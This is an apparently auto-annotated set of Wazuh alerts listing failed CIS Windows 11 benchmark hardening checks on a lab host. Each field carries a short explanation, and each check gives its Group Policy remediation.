rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.8.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2490499 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26282 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting disallows AutoPlay for MTP devices like cameras or phones. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: An attacker could use this feature to launch a program to damage a client computer or data on the computer. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Disallow Autoplay for non-volume devices. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.8.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.8.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2493544 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26283 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting sets the default behavior for Autorun commands. Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines. The recommended state for this setting is: Enabled: Do not execute any autorun commands. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Prior to Windows Vista, when media containing an autorun command is inserted, the system will automatically execute the program without user intervention. This creates a major security concern as code may be executed without user's knowledge. The default behavior starting with Windows Vista is to prompt the user whether autorun command is to be run. The autorun command is represented as a handler in the Autoplay dialog. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Do not execute any autorun commands: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Set the default behavior for AutoRun. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.8.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.10.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2497736 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26285 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether enhanced anti-spoofing is configured for devices which support it. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Enterprise managed environments are now supporting a wider range of mobile devices, increasing the security on these devices will help protect against unauthorized access on your network. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Biometrics\Facial Features\Configure enhanced anti-spoofing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Biometrics.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Note #2: In the Windows 10 Release 1511 and Windows 10 Release 1607 & Server 2016 Administrative Templates, this setting was initially named Use enhanced anti-spoofing when available. It was renamed to Configure enhanced anti-spoofing starting with the Windows 10 Release 1703 Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.10.1.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Biometrics\\FacialFeatures'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.12.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2501545 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26286 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Use of Camera' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether the use of Camera devices on the machine are permitted. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Cameras in a high security environment can pose serious privacy and data exfiltration risks - they should be disabled to help mitigate that risk. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Camera\Allow Use of Camera. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Camera.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.12.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Camera'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.14.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2504389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26288 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off cloud optimized content' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off cloud optimized content in all Windows experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Due to privacy concerns, data should never be sent to any 3rd party since this data could contain sensitive information. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud optimized content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 20H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.14.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2507226 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26287 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether cloud consumer account state content is allowed in all Windows experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The use of consumer accounts in an enterprise managed environment is not good security practice as it could lead to possible data leakage. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud consumer account state content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2510242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26289 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off experiences that help consumers make the most of their devices and Microsoft account. The recommended state for this setting is: Enabled. Note: Per Microsoft TechNet, this policy setting only applies to Windows 10 Enterprise and Windows 10 Education editions. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Having apps silently install in an enterprise managed environment is not good security practice - especially if the apps send data back to a 3rd party. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off Microsoft consumer experiences. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2513822 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26290 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether or not a PIN is required for pairing to a wireless display device. The recommended state for this setting is: Enabled: First Time OR Enabled: Always. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this setting is not configured or disabled then a PIN would not be required when pairing wireless display devices to the system, increasing the risk of unauthorized use. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: First Time OR Enabled: Always: Computer Configuration\Policies\Administrative Templates\Windows Components\Connect\Require pin for pairing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WirelessDisplay.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). The new Choose one of the following actions sub-option was later added as of the Windows 10 Release 1809 Administrative Templates. Choosing Enabled in the older templates is the equivalent of choosing Enabled: First Time in the newer templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.15.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Connect'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2517794 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26291 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not display the password reveal button' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure the display of the password reveal button in password entry user experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: This is a useful feature when entering a long and complex password, especially when using a touchscreen. The potential risk is that someone else may see your password while surreptitiously observing your screen. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Do not display the password reveal button. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredUI'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
